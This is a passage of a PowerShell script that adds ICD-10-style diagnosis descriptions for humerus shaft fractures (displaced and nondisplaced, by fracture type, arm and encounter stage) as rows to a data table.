unspecified arm","Displaced transverse fracture of shaft of humerus, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of humerus, right arm","Nondisplaced transverse fracture of shaft of humerus, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of humerus, right arm","Nondisplaced transverse fracture of shaft of humerus, right arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of humerus, right arm","Nondisplaced transverse fracture of shaft of humerus, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of humerus, right arm","Nondisplaced transverse fracture of shaft of humerus, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of humerus, right arm","Nondisplaced transverse fracture of shaft of humerus, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of humerus, right arm","Nondisplaced transverse fracture of shaft of humerus, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of humerus, right arm","Nondisplaced transverse fracture of shaft of humerus, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of humerus, left arm","Nondisplaced transverse fracture of shaft of humerus, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of humerus, left arm","Nondisplaced transverse fracture of shaft of humerus, left arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of humerus, left arm","Nondisplaced transverse fracture of shaft of humerus, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of humerus, left arm","Nondisplaced transverse fracture of shaft of humerus, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of humerus, left arm","Nondisplaced transverse fracture of shaft of humerus, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of humerus, left arm","Nondisplaced transverse fracture of shaft of humerus, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of humerus, left arm","Nondisplaced transverse fracture of shaft of humerus, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of humerus, unspecified arm","Nondisplaced transverse fracture of shaft of humerus, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of humerus, unspecified arm","Nondisplaced transverse fracture of shaft of humerus, unspecified arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of humerus, unspecified arm","Nondisplaced transverse fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of humerus, unspecified arm","Nondisplaced transverse fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of humerus, unspecified arm","Nondisplaced transverse fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of humerus, unspecified arm","Nondisplaced transverse fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of humerus, unspecified arm","Nondisplaced transverse fracture of shaft of humerus, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of humerus, right arm","Displaced oblique fracture of shaft of humerus, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of humerus, right arm","Displaced oblique fracture of shaft of humerus, right arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of humerus, right arm","Displaced oblique fracture of shaft of humerus, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of humerus, right arm","Displaced oblique fracture of shaft of humerus, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of humerus, right arm","Displaced oblique fracture of shaft of humerus, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of humerus, right arm","Displaced oblique fracture of shaft of humerus, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of humerus, right arm","Displaced oblique fracture of shaft of humerus, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of humerus, left arm","Displaced oblique fracture of shaft of humerus, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of humerus, left arm","Displaced oblique fracture of shaft of humerus, left arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of humerus, left arm","Displaced oblique fracture of shaft of humerus, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of humerus, left arm","Displaced oblique fracture of shaft of humerus, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of humerus, left arm","Displaced oblique fracture of shaft of humerus, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of humerus, left arm","Displaced oblique fracture of shaft of humerus, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of humerus, left arm","Displaced oblique fracture of shaft of humerus, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of humerus, unspecified arm","Displaced oblique fracture of shaft of humerus, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of humerus, unspecified arm","Displaced oblique fracture of shaft of humerus, unspecified arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of humerus, unspecified arm","Displaced oblique fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of humerus, unspecified arm","Displaced oblique fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of humerus, unspecified arm","Displaced oblique fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of humerus, unspecified arm","Displaced oblique fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of humerus, unspecified arm","Displaced oblique fracture of shaft of humerus, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of humerus, right arm","Nondisplaced oblique fracture of shaft of humerus, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of humerus, right arm","Nondisplaced oblique fracture of shaft of humerus, right arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of humerus, right arm","Nondisplaced oblique fracture of shaft of humerus, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of humerus, right arm","Nondisplaced oblique fracture of shaft of humerus, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of humerus, right arm","Nondisplaced oblique fracture of shaft of humerus, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of humerus, right arm","Nondisplaced oblique fracture of shaft of humerus, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of humerus, right arm","Nondisplaced oblique fracture of shaft of humerus, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of humerus, left arm","Nondisplaced oblique fracture of shaft of humerus, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of humerus, left arm","Nondisplaced oblique fracture of shaft of humerus, left arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of humerus, left arm","Nondisplaced oblique fracture of shaft of humerus, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of humerus, left arm","Nondisplaced oblique fracture of shaft of humerus, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of humerus, left arm","Nondisplaced oblique fracture of shaft of humerus, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of humerus, left arm","Nondisplaced oblique fracture of shaft of humerus, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of humerus, left arm","Nondisplaced oblique fracture of shaft of humerus, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of humerus, unspecified arm","Nondisplaced oblique fracture of shaft of humerus, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of humerus, unspecified arm","Nondisplaced oblique fracture of shaft of humerus, unspecified arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of humerus, unspecified arm","Nondisplaced oblique fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of humerus, unspecified arm","Nondisplaced oblique fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of humerus, unspecified arm","Nondisplaced oblique fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of humerus, unspecified arm","Nondisplaced oblique fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of humerus, unspecified arm","Nondisplaced oblique fracture of shaft of humerus, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of humerus, right arm","Displaced spiral fracture of shaft of humerus, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of humerus, right arm","Displaced spiral fracture of shaft of humerus, right arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of humerus, right arm","Displaced spiral fracture of shaft of humerus, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of humerus, right arm","Displaced spiral fracture of shaft of humerus, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of humerus, right arm","Displaced spiral fracture of shaft of humerus, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of humerus, right arm","Displaced spiral fracture of shaft of humerus, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of humerus, right arm","Displaced spiral fracture of shaft of humerus, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of humerus, left arm","Displaced spiral fracture of shaft of humerus, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of humerus, left arm","Displaced spiral fracture of shaft of humerus, left arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of humerus, left arm","Displaced spiral fracture of shaft of humerus, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of humerus, left arm","Displaced spiral fracture of shaft of humerus, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of humerus, left arm","Displaced spiral fracture of shaft of humerus, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of humerus, left arm","Displaced spiral fracture of shaft of humerus, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of humerus, left arm","Displaced spiral fracture of shaft of humerus, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of humerus, unspecified arm","Displaced spiral fracture of shaft of humerus, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of humerus, unspecified arm","Displaced spiral fracture of shaft of humerus, unspecified arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of humerus, unspecified arm","Displaced spiral fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of humerus, unspecified arm","Displaced spiral fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of humerus, unspecified arm","Displaced spiral fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of humerus, unspecified arm","Displaced spiral fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of humerus, unspecified arm","Displaced spiral fracture of shaft of humerus, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of humerus, right arm","Nondisplaced spiral fracture of shaft of humerus, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of humerus, right arm","Nondisplaced spiral fracture of shaft of humerus, right arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of humerus, right arm","Nondisplaced spiral fracture of shaft of humerus, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of humerus, right arm","Nondisplaced spiral fracture of shaft of humerus, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of humerus, right arm","Nondisplaced spiral fracture of shaft of humerus, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of humerus, right arm","Nondisplaced spiral fracture of shaft of humerus, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of humerus, right arm","Nondisplaced spiral fracture of shaft of humerus, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of humerus, left arm","Nondisplaced spiral fracture of shaft of humerus, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of humerus, left arm","Nondisplaced spiral fracture of shaft of humerus, left arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of humerus, left arm","Nondisplaced spiral fracture of shaft of humerus, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of humerus, left arm","Nondisplaced spiral fracture of shaft of humerus, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of humerus, left arm","Nondisplaced spiral fracture of shaft of humerus, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of humerus, left arm","Nondisplaced spiral fracture of shaft of humerus, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of humerus, left arm","Nondisplaced spiral fracture of shaft of humerus, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of humerus, unspecified arm","Nondisplaced spiral fracture of shaft of humerus, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of humerus, unspecified arm","Nondisplaced spiral fracture of shaft of humerus, unspecified arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of humerus, unspecified arm","Nondisplaced spiral fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of humerus, unspecified arm","Nondisplaced spiral fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of humerus, unspecified arm","Nondisplaced spiral fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of humerus, unspecified arm","Nondisplaced spiral fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of humerus, unspecified arm","Nondisplaced spiral fracture of shaft of humerus, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of humerus, right arm","Displaced comminuted fracture of shaft of humerus, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of humerus, right arm","Displaced comminuted fracture of shaft of humerus, right arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of humerus, right arm","Displaced comminuted fracture of shaft of humerus, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of humerus, right arm","Displaced comminuted fracture of shaft of humerus, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of humerus, right arm","Displaced comminuted fracture of shaft of humerus, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of humerus, right arm","Displaced comminuted fracture of shaft of humerus, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of humerus, right arm","Displaced comminuted fracture of shaft of humerus, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of humerus, left arm","Displaced comminuted fracture of shaft of humerus, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of humerus, left arm","Displaced comminuted fracture of shaft of humerus, left arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of humerus, left arm","Displaced comminuted fracture of shaft of humerus, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of humerus, left arm","Displaced comminuted fracture of shaft of humerus, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of humerus, left arm","Displaced comminuted fracture of shaft of humerus, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of humerus, left arm","Displaced comminuted fracture of shaft of humerus, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of humerus, left arm","Displaced comminuted fracture of shaft of humerus, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of humerus, unspecified arm","Displaced comminuted fracture of shaft of humerus, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of humerus, unspecified arm","Displaced comminuted fracture of shaft of humerus, unspecified arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of humerus, unspecified arm","Displaced comminuted fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of humerus, unspecified arm","Displaced comminuted fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of humerus, unspecified arm","Displaced comminuted fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of humerus, unspecified arm","Displaced comminuted fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of humerus, unspecified arm","Displaced comminuted fracture of shaft of humerus, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of humerus, right arm","Nondisplaced comminuted fracture of shaft of humerus, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of humerus, right arm","Nondisplaced comminuted fracture of shaft of humerus, right arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of humerus, right arm","Nondisplaced comminuted fracture of shaft of humerus, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of humerus, right arm","Nondisplaced comminuted fracture of shaft of humerus, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of humerus, right arm","Nondisplaced comminuted fracture of shaft of humerus, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of humerus, right arm","Nondisplaced comminuted fracture of shaft of humerus, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of humerus, right arm","Nondisplaced comminuted fracture of shaft of humerus, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of humerus, left arm","Nondisplaced comminuted fracture of shaft of humerus, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of humerus, left arm","Nondisplaced comminuted fracture of shaft of humerus, left arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of humerus, left arm","Nondisplaced comminuted fracture of shaft of humerus, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of humerus, left arm","Nondisplaced comminuted fracture of shaft of humerus, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of humerus, left arm","Nondisplaced comminuted fracture of shaft of humerus, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of humerus, left arm","Nondisplaced comminuted fracture of shaft of humerus, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of humerus, left arm","Nondisplaced comminuted fracture of shaft of humerus, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of humerus, unspecified arm","Nondisplaced comminuted fracture of shaft of humerus, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of humerus, unspecified arm","Nondisplaced comminuted fracture of shaft of humerus, unspecified arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of humerus, unspecified arm","Nondisplaced comminuted fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of humerus, unspecified arm","Nondisplaced comminuted fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of humerus, unspecified arm","Nondisplaced comminuted fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of humerus, unspecified arm","Nondisplaced comminuted fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of humerus, unspecified arm","Nondisplaced comminuted fracture of shaft of humerus, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of humerus, right arm","Displaced segmental fracture of shaft of humerus, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of humerus, right arm","Displaced segmental fracture of shaft of humerus, right arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of humerus, right arm","Displaced segmental fracture of shaft of humerus, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of humerus, right arm","Displaced segmental fracture of shaft of humerus, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of humerus, right arm","Displaced segmental fracture of shaft of humerus, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of humerus, right arm","Displaced segmental fracture of shaft of humerus, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of humerus, right arm","Displaced segmental fracture of shaft of humerus, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of humerus, left arm","Displaced segmental fracture of shaft of humerus, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of humerus, left arm","Displaced segmental fracture of shaft of humerus, left arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of humerus, left arm","Displaced segmental fracture of shaft of humerus, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of humerus, left arm","Displaced segmental fracture of shaft of humerus, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of humerus, left arm","Displaced segmental fracture of shaft of humerus, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of humerus, left arm","Displaced segmental fracture of shaft of humerus, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of humerus, left arm","Displaced segmental fracture of shaft of humerus, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of humerus, unspecified arm","Displaced segmental fracture of shaft of humerus, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of humerus, unspecified arm","Displaced segmental fracture of shaft of humerus, unspecified arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of humerus, unspecified arm","Displaced segmental fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of humerus, unspecified arm","Displaced segmental fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of humerus, unspecified arm","Displaced segmental fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of humerus, unspecified arm","Displaced segmental fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of humerus, unspecified arm","Displaced segmental fracture of shaft of humerus, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of humerus, right arm","Nondisplaced segmental fracture of shaft of humerus, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of humerus, right arm","Nondisplaced segmental fracture of shaft of humerus, right arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of humerus, right arm","Nondisplaced segmental fracture of shaft of humerus, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of humerus, right arm","Nondisplaced segmental fracture of shaft of humerus, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of humerus, right arm","Nondisplaced segmental fracture of shaft of humerus, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of humerus, right arm","Nondisplaced segmental fracture of shaft of humerus, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of humerus, right arm","Nondisplaced segmental fracture of shaft of humerus, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of humerus, left arm","Nondisplaced segmental fracture of shaft of humerus, left 